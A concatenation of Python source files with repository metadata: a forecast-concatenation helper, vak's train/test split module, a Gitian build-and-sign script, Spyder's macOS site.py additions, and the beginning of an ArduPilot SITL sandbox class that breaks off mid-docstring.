if length of elements in y_preds is 1:
row-index = forecasting horizon
col-index = y_pred.column
"""
# check that input format is correct
if not isinstance(y_preds, list):
raise ValueError(f"`y_preds` must be a list, but found: {type(y_preds)}")
if len(y_preds) == 0:
return pd.DataFrame(columns=cutoffs)
if not isinstance(y_preds[0], (pd.DataFrame, pd.Series)):
raise ValueError("y_preds must be a list of pd.Series or pd.DataFrame")
ylen = len(y_preds[0])
ytype = type(y_preds[0])
if isinstance(y_preds[0], pd.DataFrame):
ycols = y_preds[0].columns
for y_pred in y_preds:
if not isinstance(y_pred, ytype):
raise ValueError("all elements of y_preds must be of the same type")
if not len(y_pred) == ylen:
raise ValueError("all elements of y_preds must be of the same length")
if isinstance(y_preds[0], pd.DataFrame):
for y_pred in y_preds:
if not y_pred.columns.equals(ycols):
raise ValueError("all elements of y_preds must have the same columns")
if len(y_preds[0]) == 1:
# return series for single step ahead predictions
y_pred = pd.concat(y_preds)
else:
y_pred = pd.concat(y_preds, axis=1, keys=cutoffs)
return y_pred
| 34.539188 | 88 | 0.586543 |
38524831f9d9e121742474727eb0a90b35058a78 | 6,430 | py | Python | src/vak/split/split.py | bollwyvl/vak | 1876b30a5b72f841e19720cca2c95d7940a5d9a9 | [
"BSD-3-Clause"
] | null | null | null | src/vak/split/split.py | bollwyvl/vak | 1876b30a5b72f841e19720cca2c95d7940a5d9a9 | [
"BSD-3-Clause"
] | null | null | null | src/vak/split/split.py | bollwyvl/vak | 1876b30a5b72f841e19720cca2c95d7940a5d9a9 | [
"BSD-3-Clause"
] | null | null | null | import warnings
import numpy as np
from ..labels import from_df as labels_from_df
from .algorithms import brute_force
from .algorithms.validate import validate_durations_convert_nonnegative
def train_test_dur_split_inds(durs,
                              labels,
                              labelset,
                              train_dur,
                              test_dur,
                              val_dur=None,
                              algo='brute_force'):
    """return indices to split a dataset into training, test, and validation sets of specified durations.

    Given the durations of a set of vocalizations, and labels from the annotations for those vocalizations,
    this function returns arrays of indices for splitting up the set into training, test,
    and validation sets.
    Using those indices will produce datasets that each contain instances of all labels in the set of labels.

    Parameters
    ----------
    durs : iterable
        of float. Durations of audio files.
    labels : iterable
        of numpy arrays of str or int. Labels for segments (syllables, phonemes, etc.) in audio files.
    labelset : set, list
        set of unique labels for segments in files. Used to verify that each returned array
        of indices will produce a set that contains instances of all labels found in original
        set.
    train_dur : float
        Target duration for training set, in seconds.
    test_dur : float
        Target duration for test set, in seconds.
    val_dur : float
        Target duration for validation set, in seconds. Default is None.
        If None, no indices are returned for validation set.
    algo : str
        algorithm to use. Currently only 'brute_force' is implemented;
        any other value raises NotImplementedError. Default is 'brute_force'.
        For more information on the algorithm, see the docstring of
        vak.split.algorithms.brute_force.

    Returns
    -------
    train_inds, val_inds, test_inds : numpy.ndarray
        indices to use with some array-like object to produce sets of specified durations
    """
    if len(durs) != len(labels):
        raise ValueError(
            f"length of durs, {len(durs)} does not equal length of labels, {len(labels)}"
        )
    total_dur = sum(durs)
    # validate targets; a value of -1 means "use the remainder of the dataset"
    train_dur, val_dur, test_dur = validate_durations_convert_nonnegative(train_dur,
                                                                          val_dur,
                                                                          test_dur,
                                                                          total_dur)
    if -1 not in (train_dur, val_dur, test_dur):
        # all subsets have explicit targets: check they fit in the dataset
        total_target_dur = sum([dur for dur in (train_dur, test_dur, val_dur) if dur is not None])
        if total_target_dur < total_dur:
            warnings.warn(
                'Total target duration of training, test, and (if specified) validation sets, '
                f'{total_target_dur} seconds, is less than total duration of dataset: {total_dur:.3f}. '
                'Not all of dataset will be used.'
            )
        if total_target_dur > total_dur:
            raise ValueError(
                f'Total duration of dataset, {total_dur} seconds, is less than total target duration of '
                f'training, test, and (if specified) validation sets: {total_target_dur}'
            )
    if algo == 'brute_force':
        train_inds, val_inds, test_inds = brute_force(durs,
                                                      labels,
                                                      labelset,
                                                      train_dur,
                                                      val_dur,
                                                      test_dur)
    else:
        raise NotImplementedError(
            f'algorithm {algo} not implemented'
        )
    return train_inds, val_inds, test_inds
def dataframe(vak_df,
              labelset,
              train_dur=None,
              test_dur=None,
              val_dur=None):
    """split a dataset of vocalizations into training, test, and (optionally)
    validation subsets, specified by their target durations.

    Takes a dataset represented as a pandas DataFrame and adds a 'split'
    column assigning each row to 'train', 'val', 'test', or 'None'.

    Parameters
    ----------
    vak_df : pandas.DataFrame
        a dataset of vocalizations.
    labelset : set, list
        of str or int, set of labels for vocalizations.
    train_dur : float
        total duration of training set, in seconds. Default is None.
    test_dur : float
        total duration of test set, in seconds. Default is None.
    val_dur : float
        total duration of validation set, in seconds. Default is None.

    Returns
    -------
    vak_df : pandas.DataFrame
        a copy of the input dataset with a 'split' column added that assigns
        each vocalization (row) to one of the subsets; rows not assigned to
        any subset get the value 'None'.

    Notes
    -----
    uses `train_test_dur_split_inds` to find the indices for each subset.
    """
    # operate on a copy so the caller's DataFrame is never mutated
    df = vak_df.copy()
    seg_labels = labels_from_df(df)
    seg_durs = df['duration'].values
    train_inds, val_inds, test_inds = train_test_dur_split_inds(
        durs=seg_durs,
        labels=seg_labels,
        labelset=labelset,
        train_dur=train_dur,
        test_dur=test_dur,
        val_dur=val_dur,
    )

    # every row starts as 'None'; rows chosen for a subset are overwritten,
    # so nothing needs resetting afterwards
    split_col = np.full(len(df), 'None', dtype=object)
    for subset_name, subset_inds in (('train', train_inds),
                                     ('val', val_inds),
                                     ('test', test_inds)):
        if subset_inds is not None:
            split_col[subset_inds] = subset_name

    df['split'] = split_col
    return df
| 41.217949 | 109 | 0.565474 |
644e97c20123247fbd798a807f583aee99ba8d4a | 13,943 | py | Python | contrib/gitian-build.py | mnscoin/mnscoin | 62c62e528edc9caf844853a69521487802fdb139 | [
"MIT"
] | null | null | null | contrib/gitian-build.py | mnscoin/mnscoin | 62c62e528edc9caf844853a69521487802fdb139 | [
"MIT"
] | null | null | null | contrib/gitian-build.py | mnscoin/mnscoin | 62c62e528edc9caf844853a69521487802fdb139 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import argparse
import os
import subprocess
import sys
def setup():
    """Install build prerequisites and prepare the Gitian build environment.

    Installs the packages needed for the chosen virtualization backend
    (KVM, Docker, or the LXC default), clones the signature and builder
    repositories if missing, and creates the base VM/container image.
    Exits (requiring a reboot) after reconfiguring lxc-net on bionic hosts.
    """
    global args, workdir
    programs = ['ruby', 'git', 'apt-cacher-ng', 'make', 'wget']
    if args.kvm:
        programs += ['python-vm-builder', 'qemu-kvm', 'qemu-utils']
    elif args.docker:
        # try candidate docker package names until one installs successfully
        dockers = ['docker.io', 'docker-ce']
        for i in dockers:
            return_code = subprocess.call(['sudo', 'apt-get', 'install', '-qq', i])
            if return_code == 0:
                break
        if return_code != 0:
            print('Cannot find any way to install docker', file=sys.stderr)
            exit(1)
    else:
        programs += ['lxc', 'debootstrap']
    subprocess.check_call(['sudo', 'apt-get', 'install', '-qq'] + programs)

    # clone the repositories this script expects, if not already present
    if not os.path.isdir('gitian.sigs'):
        subprocess.check_call(['git', 'clone', 'https://github.com/MNS-Project/gitian.sigs.git'])
    if not os.path.isdir('MNS-detached-sigs'):
        subprocess.check_call(['git', 'clone', 'https://github.com/MNS-Project/MNS-detached-sigs.git'])
    if not os.path.isdir('gitian-builder'):
        subprocess.check_call(['git', 'clone', 'https://github.com/devrandom/gitian-builder.git'])
    if not os.path.isdir('MNS'):
        subprocess.check_call(['git', 'clone', 'https://github.com/MNS-Project/MNS.git'])

    # build the base image for the selected backend
    os.chdir('gitian-builder')
    make_image_prog = ['bin/make-base-vm', '--suite', 'bionic', '--arch', 'amd64']
    if args.docker:
        make_image_prog += ['--docker']
    elif not args.kvm:
        make_image_prog += ['--lxc']
    subprocess.check_call(make_image_prog)
    os.chdir(workdir)

    # on bionic LXC hosts, point lxc-net at br0; the change needs a reboot
    if args.is_bionic and not args.kvm and not args.docker:
        subprocess.check_call(['sudo', 'sed', '-i', 's/lxcbr0/br0/', '/etc/default/lxc-net'])
        print('Reboot is required')
        exit(0)
def build():
    """Run the unsigned Gitian builds for the selected platforms.

    Downloads build inputs, runs `gbuild`/`gsign` for each of Linux,
    Windows, and MacOS (as selected in `args`), moves the produced binaries
    into MNS-binaries/<version>, and optionally commits the unsigned
    signature files to the gitian.sigs repository.
    """
    global args, workdir

    os.makedirs('MNS-binaries/' + args.version, exist_ok=True)
    print('\nBuilding Dependencies\n')
    os.chdir('gitian-builder')
    os.makedirs('inputs', exist_ok=True)

    # fetch inputs needed for signing tooling, then pre-download dependencies
    subprocess.check_call(['wget', '-N', '-P', 'inputs', 'http://downloads.sourceforge.net/project/osslsigncode/osslsigncode/osslsigncode-1.7.1.tar.gz'])
    subprocess.check_call(['wget', '-N', '-P', 'inputs', 'https://bitcoincore.org/cfields/osslsigncode-Backports-to-1.7.1.patch'])
    subprocess.check_call(['make', '-C', '../MNS/depends', 'download', 'SOURCES_PATH=' + os.getcwd() + '/cache/common'])

    if args.linux:
        print('\nCompiling ' + args.version + ' Linux')
        subprocess.check_call(['bin/gbuild', '-j', args.jobs, '-m', args.memory, '--commit', 'mnscoin='+args.commit, '--url', 'mnscoin='+args.url, '../MNS/contrib/gitian-descriptors/gitian-linux.yml'])
        subprocess.check_call(['bin/gsign', '-p', args.sign_prog, '--signer', args.signer, '--release', args.version+'-linux', '--destination', '../gitian.sigs/', '../MNS/contrib/gitian-descriptors/gitian-linux.yml'])
        subprocess.check_call('mv build/out/mnscoin-*.tar.gz build/out/src/mnscoin-*.tar.gz ../MNS-binaries/'+args.version, shell=True)

    if args.windows:
        print('\nCompiling ' + args.version + ' Windows')
        subprocess.check_call(['bin/gbuild', '-j', args.jobs, '-m', args.memory, '--commit', 'mnscoin='+args.commit, '--url', 'mnscoin='+args.url, '../MNS/contrib/gitian-descriptors/gitian-win.yml'])
        subprocess.check_call(['bin/gsign', '-p', args.sign_prog, '--signer', args.signer, '--release', args.version+'-win-unsigned', '--destination', '../gitian.sigs/', '../MNS/contrib/gitian-descriptors/gitian-win.yml'])
        # the unsigned tarball is kept as an input for the later signing step
        subprocess.check_call('mv build/out/mnscoin-*-win-unsigned.tar.gz inputs/', shell=True)
        subprocess.check_call('mv build/out/mnscoin-*.zip build/out/mnscoin-*.exe ../MNS-binaries/'+args.version, shell=True)

    if args.macos:
        print('\nCompiling ' + args.version + ' MacOS')
        subprocess.check_call(['bin/gbuild', '-j', args.jobs, '-m', args.memory, '--commit', 'mnscoin='+args.commit, '--url', 'mnscoin='+args.url, '../MNS/contrib/gitian-descriptors/gitian-osx.yml'])
        subprocess.check_call(['bin/gsign', '-p', args.sign_prog, '--signer', args.signer, '--release', args.version+'-osx-unsigned', '--destination', '../gitian.sigs/', '../MNS/contrib/gitian-descriptors/gitian-osx.yml'])
        # the unsigned tarball is kept as an input for the later signing step
        subprocess.check_call('mv build/out/mnscoin-*-osx-unsigned.tar.gz inputs/', shell=True)
        subprocess.check_call('mv build/out/mnscoin-*.tar.gz build/out/mnscoin-*.dmg ../MNS-binaries/'+args.version, shell=True)

    os.chdir(workdir)

    if args.commit_files:
        print('\nCommitting '+args.version+' Unsigned Sigs\n')
        os.chdir('gitian.sigs')
        subprocess.check_call(['git', 'config', 'user.signingkey', args.signer])
        if args.linux:
            subprocess.check_call(['git', 'add', args.version+'-linux/'+args.signer])
        if args.windows:
            subprocess.check_call(['git', 'add', args.version+'-win-unsigned/'+args.signer])
        if args.macos:
            subprocess.check_call(['git', 'add', args.version+'-osx-unsigned/'+args.signer])
        subprocess.check_call(['git', 'commit', '-m', 'Add '+args.version+' unsigned sigs for '+args.signer])
        os.chdir(workdir)
def sign():
    """Produce code-signed Windows and MacOS binaries.

    Re-runs the Gitian signer descriptors against the unsigned tarballs
    kept in `inputs/`, moves the signed artifacts into
    MNS-binaries/<version>, and optionally commits the signed signature
    files (with a GPG-signed commit) to gitian.sigs.
    """
    global args, workdir
    os.chdir('gitian-builder')

    if args.windows:
        print('\nSigning ' + args.version + ' Windows')
        # the signer descriptor expects a fixed, unversioned input filename
        subprocess.check_call('cp inputs/MNS-' + args.version + '-win-unsigned.tar.gz inputs/MNS-win-unsigned.tar.gz', shell=True)
        subprocess.check_call(['bin/gbuild', '-i', '--commit', 'signature='+args.commit, '../MNS/contrib/gitian-descriptors/gitian-win-signer.yml'])
        subprocess.check_call(['bin/gsign', '-p', args.sign_prog, '--signer', args.signer, '--release', args.version+'-win-signed', '--destination', '../gitian.sigs/', '../MNS/contrib/gitian-descriptors/gitian-win-signer.yml'])
        subprocess.check_call('mv build/out/mnscoin-*win64-setup.exe ../MNS-binaries/'+args.version, shell=True)
        subprocess.check_call('mv build/out/mnscoin-*win32-setup.exe ../MNS-binaries/'+args.version, shell=True)

    if args.macos:
        print('\nSigning ' + args.version + ' MacOS')
        # the signer descriptor expects a fixed, unversioned input filename
        subprocess.check_call('cp inputs/MNS-' + args.version + '-osx-unsigned.tar.gz inputs/MNS-osx-unsigned.tar.gz', shell=True)
        subprocess.check_call(['bin/gbuild', '-i', '--commit', 'signature='+args.commit, '../MNS/contrib/gitian-descriptors/gitian-osx-signer.yml'])
        subprocess.check_call(['bin/gsign', '-p', args.sign_prog, '--signer', args.signer, '--release', args.version+'-osx-signed', '--destination', '../gitian.sigs/', '../MNS/contrib/gitian-descriptors/gitian-osx-signer.yml'])
        subprocess.check_call('mv build/out/mnscoin-osx-signed.dmg ../MNS-binaries/'+args.version+'/MNS-'+args.version+'-osx.dmg', shell=True)

    os.chdir(workdir)

    if args.commit_files:
        print('\nCommitting '+args.version+' Signed Sigs\n')
        os.chdir('gitian.sigs')
        if args.windows:
            subprocess.check_call(['git', 'add', args.version+'-win-signed/'+args.signer])
        if args.macos:
            subprocess.check_call(['git', 'add', args.version+'-osx-signed/'+args.signer])
        subprocess.check_call(['git', 'commit', '-S', '-m', 'Add '+args.version+' signed binary sigs for '+args.signer])
        os.chdir(workdir)
def verify():
    """Verify Gitian build results against the signatures in gitian.sigs.

    Runs `gverify` for each selected platform; for Windows and MacOS the
    signed results are additionally verified when --sign was given.
    `gverify` exits non-zero on mismatch, which `check_call` turns into an
    exception, aborting the script.
    """
    global args, workdir
    os.chdir('gitian-builder')

    if args.linux:
        # fix: the original ran this identical print/gverify pair twice
        # (copy-paste duplication); a single verification is sufficient.
        print('\nVerifying v'+args.version+' Linux\n')
        subprocess.check_call(['bin/gverify', '-v', '-d', '../gitian.sigs/', '-r', args.version+'-linux', '../MNS/contrib/gitian-descriptors/gitian-linux.yml'])
    if args.windows:
        print('\nVerifying v'+args.version+' Windows\n')
        subprocess.check_call(['bin/gverify', '-v', '-d', '../gitian.sigs/', '-r', args.version+'-win-unsigned', '../MNS/contrib/gitian-descriptors/gitian-win.yml'])
        if args.sign:
            print('\nVerifying v'+args.version+' Signed Windows\n')
            subprocess.check_call(['bin/gverify', '-v', '-d', '../gitian.sigs/', '-r', args.version+'-win-signed', '../MNS/contrib/gitian-descriptors/gitian-win-signer.yml'])
    if args.macos:
        print('\nVerifying v'+args.version+' MacOS\n')
        subprocess.check_call(['bin/gverify', '-v', '-d', '../gitian.sigs/', '-r', args.version+'-osx-unsigned', '../MNS/contrib/gitian-descriptors/gitian-osx.yml'])
        if args.sign:
            print('\nVerifying v'+args.version+' Signed MacOS\n')
            subprocess.check_call(['bin/gverify', '-v', '-d', '../gitian.sigs/', '-r', args.version+'-osx-signed', '../MNS/contrib/gitian-descriptors/gitian-osx-signer.yml'])

    os.chdir(workdir)
def main():
    """Parse command-line arguments and drive setup/build/sign/verify.

    Normalizes the parsed arguments (platform flags, commit ref,
    virtualization backend environment variables), checks out the requested
    version or pull request of the MNS repository, then invokes the
    requested phases in order: setup, build, sign, verify.
    """
    global args, workdir

    parser = argparse.ArgumentParser(usage='%(prog)s [options] signer version')
    parser.add_argument('-c', '--commit', action='store_true', dest='commit', help='Indicate that the version argument is for a commit or branch')
    parser.add_argument('-p', '--pull', action='store_true', dest='pull', help='Indicate that the version argument is the number of a github repository pull request')
    parser.add_argument('-u', '--url', dest='url', default='https://github.com/MNS-Project/MNS', help='Specify the URL of the repository. Default is %(default)s')
    parser.add_argument('-v', '--verify', action='store_true', dest='verify', help='Verify the Gitian build')
    parser.add_argument('-b', '--build', action='store_true', dest='build', help='Do a Gitian build')
    parser.add_argument('-s', '--sign', action='store_true', dest='sign', help='Make signed binaries for Windows and MacOS')
    parser.add_argument('-B', '--buildsign', action='store_true', dest='buildsign', help='Build both signed and unsigned binaries')
    parser.add_argument('-o', '--os', dest='os', default='lwm', help='Specify which Operating Systems the build is for. Default is %(default)s. l for Linux, w for Windows, m for MacOS')
    parser.add_argument('-j', '--jobs', dest='jobs', default='2', help='Number of processes to use. Default %(default)s')
    parser.add_argument('-m', '--memory', dest='memory', default='2000', help='Memory to allocate in MiB. Default %(default)s')
    parser.add_argument('-k', '--kvm', action='store_true', dest='kvm', help='Use KVM instead of LXC')
    parser.add_argument('-d', '--docker', action='store_true', dest='docker', help='Use Docker instead of LXC')
    parser.add_argument('-S', '--setup', action='store_true', dest='setup', help='Set up the Gitian building environment. Uses LXC. If you want to use KVM, use the --kvm option. Only works on Debian-based systems (Ubuntu, Debian)')
    parser.add_argument('-D', '--detach-sign', action='store_true', dest='detach_sign', help='Create the assert file for detached signing. Will not commit anything.')
    parser.add_argument('-n', '--no-commit', action='store_false', dest='commit_files', help='Do not commit anything to git')
    parser.add_argument('signer', help='GPG signer to sign each build assert file')
    parser.add_argument('version', help='Version number, commit, or branch to build. If building a commit or branch, the -c option must be specified')

    args = parser.parse_args()

    workdir = os.getcwd()

    # expand the single --os string into per-platform booleans
    args.linux = 'l' in args.os
    args.windows = 'w' in args.os
    args.macos = 'm' in args.os

    # check_output returns bytes here, hence the b'bionic' comparison
    args.is_bionic = b'bionic' in subprocess.check_output(['lsb_release', '-cs'])

    if args.buildsign:
        args.build=True
        args.sign=True

    if args.kvm and args.docker:
        raise Exception('Error: cannot have both kvm and docker')

    # with --detach-sign, 'true' is a no-op stand-in for the gpg command
    args.sign_prog = 'true' if args.detach_sign else 'gpg --detach-sign'

    # Set environment variable USE_LXC or USE_DOCKER, let gitian-builder know that we use lxc or docker
    if args.docker:
        os.environ['USE_DOCKER'] = '1'
    elif not args.kvm:
        os.environ['USE_LXC'] = '1'
        if not 'GITIAN_HOST_IP' in os.environ.keys():
            os.environ['GITIAN_HOST_IP'] = '10.0.3.1'
        if not 'LXC_GUEST_IP' in os.environ.keys():
            os.environ['LXC_GUEST_IP'] = '10.0.3.5'

    # Disable for MacOS if no SDK found
    if args.macos and not os.path.isfile('gitian-builder/inputs/MacOSX10.11.sdk.tar.gz'):
        print('Cannot build for MacOS, SDK does not exist. Will build for other OSes')
        args.macos = False

    script_name = os.path.basename(sys.argv[0])

    # Signer and version shouldn't be empty
    if args.signer == '':
        print(script_name+': Missing signer.')
        print('Try '+script_name+' --help for more information')
        exit(1)

    if args.version == '':
        print(script_name+': Missing version.')
        print('Try '+script_name+' --help for more information')
        exit(1)

    # Add leading 'v' for tags
    if args.commit and args.pull:
        raise Exception('Cannot have both commit and pull')
    args.commit = ('' if args.commit else 'v') + args.version

    if args.setup:
        setup()

    os.chdir('MNS')
    if args.pull:
        # for pull requests, fetch the merge ref in both checkouts and pin
        # the build to the exact merge commit hash
        subprocess.check_call(['git', 'fetch', args.url, 'refs/pull/'+args.version+'/merge'])
        os.chdir('../gitian-builder/inputs/MNS')
        subprocess.check_call(['git', 'fetch', args.url, 'refs/pull/'+args.version+'/merge'])
        args.commit = subprocess.check_output(['git', 'show', '-s', '--format=%H', 'FETCH_HEAD'], universal_newlines=True, encoding='utf8').strip()
        args.version = 'pull-' + args.version
    print(args.commit)
    subprocess.check_call(['git', 'fetch'])
    subprocess.check_call(['git', 'checkout', args.commit])
    os.chdir(workdir)

    if args.build:
        build()

    if args.sign:
        sign()

    if args.verify:
        verify()
# script entry point: only run when executed directly, not when imported
if __name__ == '__main__':
    main()
| 55.995984 | 231 | 0.641827 |
5f0c43252f772ee693e18243169f841597ff88c9 | 4,823 | py | Python | spyderlib/widgets/externalshell/osx_app_site.py | SylvainCorlay/spyder | b87bfa08abd53e1c97b59feeb51f665f6a632415 | [
"MIT"
] | 2 | 2016-01-23T11:52:24.000Z | 2021-04-27T03:52:25.000Z | spyder/widgets/externalshell/osx_app_site.py | ShenggaoZhu/spyder | 3556172888d8bb5dcc5f735676868a0d78d7d604 | [
"MIT"
] | null | null | null | spyder/widgets/externalshell/osx_app_site.py | ShenggaoZhu/spyder | 3556172888d8bb5dcc5f735676868a0d78d7d604 | [
"MIT"
] | null | null | null | #
# IMPORTANT NOTE: Don't add a coding line here! It's not necessary for
# site files
#
# Spyder's MacOS X App site.py additions
#
# It includes missing variables and paths that are not added by
# py2app to its own site.py
#
# These functions were taken verbatim from Python 2.7.3 site.py
#
import sys
import os
try:
import __builtin__ as builtins
except ImportError:
# Python 3
import builtins
# for distutils.commands.install
# These values are module-level caches, initialized lazily on first call to
# getuserbase() and getusersitepackages() respectively.
USER_SITE = None
USER_BASE = None
def getuserbase():
    """Returns the `user base` directory path.

    The `user base` directory can be used to store data. The result is
    computed once via sysconfig and cached in the module-level global
    ``USER_BASE``.
    """
    global USER_BASE
    if USER_BASE is None:
        from sysconfig import get_config_var
        USER_BASE = get_config_var('userbase')
    return USER_BASE
def getusersitepackages():
    """Returns the user-specific site-packages directory path.

    Also ensures ``USER_BASE`` is initialized (via getuserbase()), and
    caches its own result in the module-level global ``USER_SITE``.
    """
    global USER_SITE
    getuserbase()  # called for its side effect: this also sets USER_BASE
    if USER_SITE is None:
        from sysconfig import get_path
        scheme = '%s_user' % os.name
        if sys.platform == 'darwin':
            from sysconfig import get_config_var
            if get_config_var('PYTHONFRAMEWORK'):
                scheme = 'osx_framework_user'
        USER_SITE = get_path('purelib', scheme)
    return USER_SITE
class _Printer(object):
    """interactive prompt objects for printing the license text, a list of
    contributors and the copyright notice.

    The text is read from the first readable file named in `files` found in
    one of the `dirs`; if none can be read, the fallback string `data` is
    used instead.
    """

    # maximum number of lines shown before paging / summarizing
    MAXLINES = 23

    def __init__(self, name, data, files=(), dirs=()):
        # name: builtin name this printer is bound to (e.g. 'license')
        # data: fallback text if no file can be read
        # files/dirs: candidate file names and directories to search
        self.__name = name
        self.__data = data
        self.__files = files
        self.__dirs = dirs
        self.__lines = None  # lazily populated by __setup()

    def __setup(self):
        """Lazily load the text to display, splitting it into lines."""
        if self.__lines:
            return
        data = None
        # try each dir/file combination until one opens and reads cleanly
        for dir in self.__dirs:
            for filename in self.__files:
                filename = os.path.join(dir, filename)
                try:
                    fp = open(filename, "rU")
                    data = fp.read()
                    fp.close()
                    break
                except IOError:
                    pass
            if data:
                break
        if not data:
            data = self.__data
        self.__lines = data.split('\n')
        self.__linecnt = len(self.__lines)

    def __repr__(self):
        # short texts are shown inline; long ones print a hint to call()
        self.__setup()
        if len(self.__lines) <= self.MAXLINES:
            return "\n".join(self.__lines)
        else:
            return "Type %s() to see the full %s text" % ((self.__name,)*2)

    def __call__(self):
        """Page through the full text, MAXLINES at a time."""
        self.__setup()
        prompt = 'Hit Return for more, or q (and Return) to quit: '
        lineno = 0
        while 1:
            try:
                for i in range(lineno, lineno + self.MAXLINES):
                    print(self.__lines[i])
            except IndexError:
                # ran off the end of the text: done
                break
            else:
                lineno += self.MAXLINES
                key = None
                while key is None:
                    try:
                        # raw_input exists on Python 2; fall back to input()
                        key = raw_input(prompt)
                    except NameError:
                        # Python 3
                        key = input(prompt)
                    if key not in ('', 'q'):
                        key = None
                if key == 'q':
                    break
def setcopyright():
    """Set 'copyright', 'credits' and 'license' in builtins.

    Each is bound to a _Printer instance; 'license' additionally searches
    for a LICENSE file next to the stdlib and in the current directory.
    """
    builtins.copyright = _Printer("copyright", sys.copyright)
    if sys.platform[:4] == 'java':
        builtins.credits = _Printer(
            "credits",
            "Jython is maintained by the Jython developers (www.jython.org).")
    else:
        builtins.credits = _Printer("credits", """\
    Thanks to CWI, CNRI, BeOpen.com, Zope Corporation and a cast of thousands
for supporting Python development. See www.python.org for more information.""")
    here = os.path.dirname(os.__file__)
    builtins.license = _Printer(
        "license", "See http://www.python.org/%.3s/license.html" % sys.version,
        ["LICENSE.txt", "LICENSE"],
        [os.path.join(here, os.pardir), here, os.curdir])
class _Helper(object):
"""Define the builtin 'help'.
This is a wrapper around pydoc.help (with a twist).
"""
def __repr__(self):
return "Type help() for interactive help, " \
"or help(object) for help about object."
def __call__(self, *args, **kwds):
import pydoc
return pydoc.help(*args, **kwds)
def sethelper():
    """Install an instance of _Helper as the 'help' builtin."""
    builtins.help = _Helper()
| 29.408537 | 84 | 0.576405 |
0968ec6137cebff5770a91618e0f67f3705a5ccf | 19,822 | py | Python | houston/ardu/sandbox.py | squaresLab/Houston | 088cb52fe2d36dfb25b03b98f51b09d56f7d47d0 | [
"MIT"
] | 3 | 2018-11-12T08:04:27.000Z | 2021-12-01T11:25:33.000Z | houston/ardu/sandbox.py | ChrisTimperley/ros_mission_sim | 088cb52fe2d36dfb25b03b98f51b09d56f7d47d0 | [
"MIT"
] | 220 | 2017-10-02T19:49:10.000Z | 2019-08-01T22:08:01.000Z | houston/ardu/sandbox.py | ChrisTimperley/ros_mission_sim | 088cb52fe2d36dfb25b03b98f51b09d56f7d47d0 | [
"MIT"
] | 2 | 2018-10-04T21:03:58.000Z | 2018-10-08T13:33:56.000Z | from typing import Optional, Sequence
import time
import shlex
from timeit import default_timer as timer
import os
import sys
import threading
import logging
import docker
import dronekit
from bugzoo.client import Client as BugZooClient
from pymavlink import mavutil
from .home import HomeLocation
from .connection import CommandLong, MAVLinkConnection, MAVLinkMessage
from ..util import Stopwatch
from ..sandbox import Sandbox as BaseSandbox
from ..command import Command, CommandOutcome
from ..connection import Message
from ..mission import MissionOutcome
from ..trace import MissionTrace, CommandTrace, TraceRecorder
from ..exceptions import NoConnectionError, \
ConnectionLostError, \
PostConnectionSetupFailed, \
VehicleNotReadyError
# module-level logger; DEBUG so callers can filter via handler configuration
logger = logging.getLogger(__name__)  # type: logging.Logger
logger.setLevel(logging.DEBUG)

# seconds since the last heartbeat after which the MAVLink connection is
# considered lost (compared against `last_heartbeat` in run_and_trace)
TIME_LOST_CONNECTION = 5.0
def detect_lost_connection(f):
    """
    Decorates a given function such that any dronekit APIExceptions
    encountered during the execution of that function will be caught and
    re-raised as ConnectionLostError exceptions.
    """
    import functools

    # fix: functools.wraps preserves the wrapped function's name, docstring
    # and metadata, which the original decorator discarded (hurting logging
    # and debugging of the decorated Sandbox methods).
    @functools.wraps(f)
    def wrapped(*args, **kwargs):
        try:
            return f(*args, **kwargs)
        except dronekit.APIException:
            raise ConnectionLostError
    return wrapped
class Sandbox(BaseSandbox):
    """Sandbox for interacting with an ArduPilot-based system (SITL)
    running inside a BugZoo container."""
    def __init__(self,
                 *args,
                 home: Optional[HomeLocation] = None,
                 **kwargs
                 ) -> None:
        # home: starting location for the simulated vehicle; when omitted a
        # fixed default is used (presumably ArduPilot's standard SITL home
        # location -- TODO confirm against upstream defaults).
        super().__init__(*args, **kwargs)
        self.__connection = None  # established later by start()
        self.__sitl_thread = None  # background thread running _launch_sitl
        self.__fn_log = None  # type: Optional[str]  # SITL log path inside the container
        if home:
            self.__home = home
        else:
            self.__home = HomeLocation(latitude=-35.362938,
                                       longitude=149.165085,
                                       altitude=584,
                                       heading=270)
    @property
    def home(self) -> HomeLocation:
        """The home location used when launching the SITL."""
        return self.__home
    @property
    def connection(self,
                   raise_exception: bool = True
                   ) -> Optional[MAVLinkConnection]:
        """
        The MAVLink connection to the system running inside this sandbox,
        as established by `start`.

        Raises:
            NoConnectionError: if there is no connection to the system running
                inside this sandbox.
        """
        # NOTE(review): as a property this is always accessed without
        # arguments, so `raise_exception` can never be passed and always
        # takes its default (True) -- the parameter is effectively dead.
        if self.__connection is None and raise_exception:
            raise NoConnectionError()
        return self.__connection
def has_connection(self) -> bool:
"""
Checks whether a connection to the system running inside this
sandbox exists.
"""
return self.__connection is not None
    @property
    def vehicle(self,
                raise_exception: bool = True
                ) -> Optional[dronekit.Vehicle]:
        """
        The dronekit vehicle behind the MAVLink connection.

        Raises:
            NoConnectionError: if no connection has been established.
        """
        # NOTE(review): property access cannot pass `raise_exception`, so it
        # always takes its default (True) -- the parameter is effectively dead.
        if not self.has_connection() and raise_exception:
            raise NoConnectionError()
        return self.connection.conn
    def read_logs(self) -> str:
        """
        Reads the contents of the log file for this sandbox.

        The log file is created inside the container by `_launch_sitl`,
        so this must only be called after the SITL has been launched.
        """
        assert self.__fn_log, "no log file created for sandbox."
        return self._bugzoo.files.read(self.container, self.__fn_log)
    def update(self, message: Message) -> None:
        """
        Evolves the sandbox state with a newly received MAVLink message and,
        when a recorder is active, records both the new state and the message.
        Registered as the 'update' hook on the MAVLink connection in `start`.
        """
        # NOTE(review): `self.__state_lock` and `self.__state` are
        # name-mangled here to `_Sandbox__state_lock` / `_Sandbox__state` but
        # are never assigned in this class -- confirm that BaseSandbox really
        # provides attributes under those mangled names (standard mangling in
        # the base class would produce `_BaseSandbox__*` instead).
        with self.__state_lock:
            state = self.__state.evolve(message,
                                        self.running_time,
                                        self.connection)
            self.__state = state
            if self.recorder:
                self.recorder.record_state(state)
                self.recorder.record_message(message)
    def _launch_sitl(self,
                     name_bin: str = 'ardurover',
                     name_model: str = 'rover',
                     fn_param: str = '',  # FIXME what are the semantics of an empty string? # noqa: pycodestyle
                     verbose: bool = True
                     ) -> None:
        """
        Launches the SITL inside the sandbox and blocks until its execution
        has finished.

        Parameters:
            name_bin: name of the SITL binary (under the ArduPilot build dir).
            name_model: vehicle model passed to the SITL via --model.
            fn_param: path to a parameter defaults file passed via --defaults.
            verbose: when True, streams the SITL's output into the logger.
        """
